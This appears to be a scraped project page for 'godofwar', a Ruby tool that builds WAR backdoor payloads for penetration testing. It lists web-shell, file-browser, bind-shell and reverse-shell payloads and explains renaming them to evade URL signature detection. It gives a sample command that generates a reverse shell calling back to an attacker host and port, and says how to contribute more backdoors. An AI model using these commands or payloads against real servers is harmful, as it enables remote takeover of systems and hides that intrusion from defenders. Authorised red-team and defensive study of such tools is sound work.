image
A command-line tool to generate war payloads for penetration testing / red teaming purposes, written in ruby. Features Preexisting payloads. (try -l/–list ) cmd_get filebrowser bind_shell reverse_shell reverse_shell_ui Configurable backdoor. (try –host/-port ) Control over payload name. To avoid malicious name after deployment to bypass URL name signatures. Installation $ gem install godofwar Usage $ godofwar -h Help menu: -p, –payload PAYLOAD Generates war from one of the available payloads. (check -l/–list) -H, –host IP_ADDR Local or Remote IP address for the chosen payload (used with -p/–payload) -P, –port PORT Local or Remote Port for the chosen payload (used with -p/–payload) -o, –output [FILE] Output file and the deployment name. (default is the payload original name. check ‘-l/–list') -l, –list list all available payloads. -h, –help Show this help message. Example List all payloads $ godofwar -l ├── cmd_get │   └── Information: │ ├── Description: Command execution via web interface │ ├── OS: any │ ├── Settings: {“false”=>”No Settings required!”} │ ├── Usage: http://host/cmd.jsp?cmd=whoami │ ├── References: [“https://github.com/danielmiessler/SecLists/tree/master/Payloads/laudanum-0.8/jsp”] │ └── Local Path: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/cmd_get ├── filebrowser │   └── Information: │ ├── Description: Remote file browser, upload, download, unzip files and native command execution │ ├── OS: any │ ├ ;── Settings: {“false”=>”No Settings required!”} │ ├── Usage: http://host/filebrowser.jsp │ ├── References: [“http://www.vonloesch.de/filebrowser.html”] │ └── Local Path: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/filebrowser ├── bind_shell │   └── Information: │ ├── Description: TCP bind shell │ ├── OS: any │ ├── Settings: {“port”=>4444, “false”=>”No Settings required!”} │ ├── Usage: http://host/reverse-shell.jsp │ ├── References: [“Metasploit – msfvenom -p java/jsp_shell_bind_tcp”] │ └ ── Local Path: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/bind_shell ├── reverse_shell_ui │   └── Information: │ ├── Description: TCP reverse shell with a HTML form to set LHOST and LPORT from browser. │ ├── OS: any │ ├── Settings: {“host”=>”attacker”, “port”=>4444, “false”=>”No Settings required!”} │ ├── Usage: http://host/reverse_shell_ui.jsp │ ├── References: [] │ └── Local Path: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/reverse_shell_ui ├── reverse_shell │   └── Information: │ ├── De scription: TCP reverse shell. LHOST and LPORT are hardcoded │ ├── OS: any │ ├── Settings: {“host”=>”attacker”, “port”=>4444, “false”=>”No Settings required!”} │ ├── Usage: http://host/reverse_shell.jsp │ ├── References: [] │ └── Local Path: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/reverse_shell Generate payload with LHOST and LPORT godofwar -p reverse_shell -H 192.168.100.10 -P 9911 -o puppy After deployment, you can visit your shell on ( http://host:8080/puppy/puppy.jsp ) Contributing Fork it ( https://github.com/KINGSABRI/godofwar/fork ). Create your feature branch (git checkout -b my-new-feature). Commit your changes (git commit -am ‘Add some feature'). Push to the branch (git push origin my-new-feature). Create a new Pull Request. Add More Backdoors To contribute by adding more backdoors: create a new folder under payloads directory. put your jsp file under the newly created directory (make it the same directory name). update payloads_info.json file with description. supported operating system (try to make it universal though). configurations: default host and port. references: the payload origin or its creator credits. Download Godofwar